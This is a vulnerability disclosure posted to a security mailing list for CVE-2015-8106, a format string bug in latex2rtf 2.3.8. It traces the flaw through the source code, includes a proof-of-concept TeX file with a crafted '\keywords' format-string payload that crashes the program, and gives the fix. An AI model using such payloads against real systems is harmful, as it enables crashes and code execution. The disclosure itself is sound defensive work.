CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability

[김종권 <jgkim () ropas snu ac kr>]

Dear List,

I am writing this to report a format string vulnerability in ubuntu 
package latex2rtf. (2.3.8, which is the latest version).
Also I already have been assigned a CVE identifier from MITRE 
"CVE-2015-8106", so I want to make public this vulnerability.


- Target Platform
   Windows, Linux, OS X
- Target Version
   2.3.8 (Latest Version)

- Vulnerability description
When the user runs latex2rtf with malicious crafted tex file, an 
attacker can execute arbitrary code.
The function CmdKeywords processes the \keywords command in tex file.
The variable `keywords' in the function CmdKeywords may hold a malicious 
input string, which can be used as a format argument of vsnprintf.

-- Step 1. (funct1.c 1789 line)

1789        char *keywords = getBraceParam();

For instance, the variable keywords will point to the string “MALICIOUS” 
when a text line "\keywords{MALICIOUS}” exists in an input tex file.

-- Step 2. (funct1.c 1798 line)

1798    fprintRTF(keywords);

fprintfRTF() is called in line 1798, and the parameter is used as a 
format string, which can be malicious, as we described in step 1.

-- Step 3. (main.c 873 line)
858    void fprintRTF(char *format, ...){
      ...
873    vsnprintf(buffer, 1024, format, apf);
      ...

The value of format, which may be malicious, is used as an argument of 
vsnprintf in line 873, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.tex"
========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================
Execute
==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)

Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================

-- Step 5. How to fix
(funct1.c 1798 line)

1798    fprintRTF(keywords);  ===>  fprintRTF("%s", keywords);


- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. 
Our analyzer reported an alarm in latex2rtf main.c 873 line, So we 
looked for a latex2rtf source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the 
absence of fatal bugs in C source. Sparrow is designed by Abstract 
Interpretation and the analysis is sound in design. Sparrow adopts a 
number of well-founded static analysis techniques[2,3] for scalability, 
precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo 
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like 
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun 
Yi. PLDI'12

Sincerely, Jong-Gwon Kim & Woosuk Lee

-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim () ropas snu ac kr
-----------------------------
-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee () ropas snu ac kr
-----------------------------